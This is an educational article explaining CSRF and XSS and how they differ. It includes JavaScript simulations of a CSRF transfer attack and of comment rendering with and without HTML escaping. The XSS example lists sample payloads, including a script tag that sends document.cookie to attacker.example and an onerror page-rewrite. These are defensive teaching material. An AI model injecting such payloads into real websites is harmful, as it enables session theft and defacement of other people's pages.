The basic concept, abbreviation, and full name of CSRF
CSRF (Cross-Site Request Forgery): an attack in which a third-party site makes the victim's browser send a request to a site where the victim is already logged in.
PS: Be sure to remember what the abbreviation stands for; the exact wording of the full name matters less.
CSRF attack principle
The user is a registered user of website A and logs in, so website A issues a cookie to the user's browser. Later, without logging out of A, the user visits website B, which the attacker controls. B's page contains a hidden form, image tag or script that makes the browser send a request to A's API. Because the request is addressed to A, the browser attaches A's cookie to it, and A processes the request as if the user had made it deliberately.
As the flow above shows, a CSRF attack requires two conditions to hold for the victim:
(1) The user has logged in to trusted website A, and A's session cookie is stored in the browser. (If the user is not logged in to A, the request that B induces to A's API is simply rejected or redirected to a login page, and nothing happens.)
(2) Without logging out of A, the user visits malicious website B. (What is actually exploited is a weakness of website A: it accepts any request that carries the cookie, without checking that the request originated from its own pages.)
When we talk about CSRF, we must make these two points clear.
Note that the cookie is what keeps the user logged in, but website B never obtains the cookie: it cannot read it and does not need to, because the browser attaches it automatically to the request B triggers. This is also why the fix belongs on website A, for example a per-session token that only A's own pages carry, or marking the cookie SameSite so that the browser withholds it from cross-site requests.
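To make the two conditions concrete, here is an added example (not code from the original article) that simulates the flow in JavaScript: a browser with a cookie jar, website A's transfer API in a vulnerable form and in a form that also checks a per-session token, and a page on website B that triggers the request. The hostnames a.example and b.example, the transfer API, the balances and the token format are all assumptions made up for the example.

```javascript
// Added example, not code from the original article: a simulation of the CSRF
// flow above. Hostnames (a.example, b.example), the "transfer" API, balances
// and the token format are all made up for illustration.

// The browser's cookie jar, keyed by the host that set the cookie.
const cookieJar = {};

// Website A's server-side state.
const sessionsA = {};             // session id -> username
const csrfTokensA = {};           // session id -> CSRF token
const balancesA = { alice: 100 };
let sessionCounter = 0;

// Condition (1): the user logs in to A, and the browser stores A's cookie.
function loginToA(username) {
  const sid = "sess-" + (++sessionCounter);
  sessionsA[sid] = username;
  cookieJar["a.example"] = { session: sid };
  return sid;
}

// A page served by A embeds a per-session token in its forms. Only pages that
// A itself serves carry it; B has no way to read it.
function pageFromA(sid) {
  if (!csrfTokensA[sid]) csrfTokensA[sid] = "tok-" + sid;
  return { csrfToken: csrfTokensA[sid] };
}

// Vulnerable transfer API: trusts any request that arrives with a valid
// session cookie, regardless of which site caused the browser to send it.
function transferApiVulnerable(request) {
  const user = sessionsA[request.cookies && request.cookies.session];
  if (!user) return { status: 401, body: "login required" };
  balancesA[user] -= request.body.amount;
  return { status: 200, body: "ok" };
}

// Hardened transfer API: the cookie proves who the user is, the token proves
// that the request came from a page A served.
function transferApiHardened(request) {
  const sid = request.cookies && request.cookies.session;
  const user = sessionsA[sid];
  if (!user) return { status: 401, body: "login required" };
  if (!request.body.csrfToken || request.body.csrfToken !== csrfTokensA[sid]) {
    return { status: 403, body: "missing or invalid CSRF token" };
  }
  balancesA[user] -= request.body.amount;
  return { status: 200, body: "ok" };
}

// The browser: whichever page initiates a request to a host, the browser
// attaches that host's cookies. The initiating page only chooses the target
// and the body; it never sees the cookie value.
function browserRequest(initiatingOrigin, targetHost, handler, body) {
  return handler({ origin: initiatingOrigin, cookies: cookieJar[targetHost], body });
}

// Website B's page: an auto-submitting form (or fetch) aimed at A's API.
function maliciousPageB(handler) {
  return browserRequest("https://b.example", "a.example", handler, { amount: 50 });
}

// Reset state, then play the scenario from the article: log in to A, do not
// log out, visit B. Returns the API status and alice's balance afterwards.
function runCsrfScenario(handler, loggedIn = true) {
  balancesA.alice = 100;
  delete cookieJar["a.example"];
  if (loggedIn) loginToA("alice");
  const response = maliciousPageB(handler);
  return { status: response.status, balance: balancesA.alice };
}

// The legitimate flow for comparison: alice submits A's own form, which
// carries the token, so the hardened API accepts it.
function runLegitimateTransfer() {
  balancesA.alice = 100;
  delete cookieJar["a.example"];
  const sid = loginToA("alice");
  const page = pageFromA(sid);
  const response = browserRequest("https://a.example", "a.example",
    transferApiHardened, { amount: 50, csrfToken: page.csrfToken });
  return { status: response.status, balance: balancesA.alice };
}
```

Calling runCsrfScenario(transferApiVulnerable) and runCsrfScenario(transferApiHardened) shows the difference: the vulnerable API moves 50 from alice's balance even though B never saw the cookie, the hardened one answers 403 because B cannot supply the token, and with no login at all both answer 401, which is the case described under condition (1). In a real deployment the token check is paired with the SameSite cookie attribute and an Origin or Referer check; the simulation models only the token.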
Basic concepts of XSS
XSS (Cross-Site Scripting): a script injection attack against a website's pages.
XSS attack principle
The core of an XSS attack is that the attacker needs no login or authentication at all: through otherwise legitimate operations (such as entering text in a URL parameter or in a comment box), they inject script (JavaScript, HTML fragments, etc.) into a page of the site, and the browser of every user who views that page executes it as if it were the site's own code.
The result may be:
stealing cookies or session data; breaking the normal structure of the page; inserting advertisements or other malicious content; using the victims' browsers to launch DDoS attacks.
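As an added example (not from the original article), the following JavaScript renders a comment the vulnerable way, by concatenating the text straight into HTML, and the hardened way, by escaping it first. The sample comments and the page fragment are constructed for the example, and containsInjectedMarkup is a crude stand-in for the browser's HTML parser, not a real one.

```javascript
// Added example, not code from the original article: a comment box rendered
// two ways. The comments and the list-item template are constructed here.

// Vulnerable: user input is concatenated straight into the page's HTML, so a
// comment such as <script>...</script> or an <img onerror=...> becomes markup
// that the victim's browser parses and executes.
function renderCommentVulnerable(comment) {
  return "<li class=\"comment\">" + comment + "</li>";
}

// Hardened: escape the five characters HTML treats as markup before inserting,
// so the browser displays the comment as text instead of parsing it.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}
function renderCommentHardened(comment) {
  return "<li class=\"comment\">" + escapeHtml(comment) + "</li>";
}

// Crude stand-in for the browser's parser: does the part of the fragment that
// came from the user still contain the start of an HTML tag?
function containsInjectedMarkup(html) {
  const body = html.slice("<li class=\"comment\">".length, -"</li>".length);
  return /<\/?[a-z]/i.test(body);
}

// Constructed sample comments: one benign, two classic XSS payloads (the second
// exfiltrates document.cookie, the third rewrites the page).
const SAMPLE_COMMENTS = [
  "Great article, thanks!",
  "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>",
  "<img src=x onerror=\"document.body.innerHTML='<h1>pwned</h1>'\">",
];

// How many of the sample comments survive rendering as live markup.
function injectedCount(renderer) {
  return SAMPLE_COMMENTS.filter((c) => containsInjectedMarkup(renderer(c))).length;
}
```

injectedCount(renderCommentVulnerable) is 2 and injectedCount(renderCommentHardened) is 0. The escaping is what PHP's htmlspecialchars($comment, ENT_QUOTES, 'UTF-8') does; it is correct for text placed in an element body, but input placed inside an attribute value, a URL or a script block needs the encoding for that context, and cookie theft of the kind in the second sample comment is further limited by setting HttpOnly on the session cookie.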
The difference between CSRF and XSS
Difference 1:
CSRF: The user needs to be logged in to website A first, so that the browser holds A's cookie. XSS: No login is required.
Difference 2 (difference in principle):
CSRF: It exploits website A's trust in the browser's cookie to make the browser send requests to A's API on the user's behalf; the attacker never runs code on A. XSS: It injects JS code into website A's pages, and that code runs in the victim's browser with A's origin, so it can tamper with A's content, read A's page (including any anti-CSRF token embedded in it) and any cookie not marked HttpOnly, and send requests that look exactly like the user's own. For that reason an XSS hole on A also defeats A's CSRF defences.
The above is the detailed content of The difference between PHP CSRF attack and XSS attack.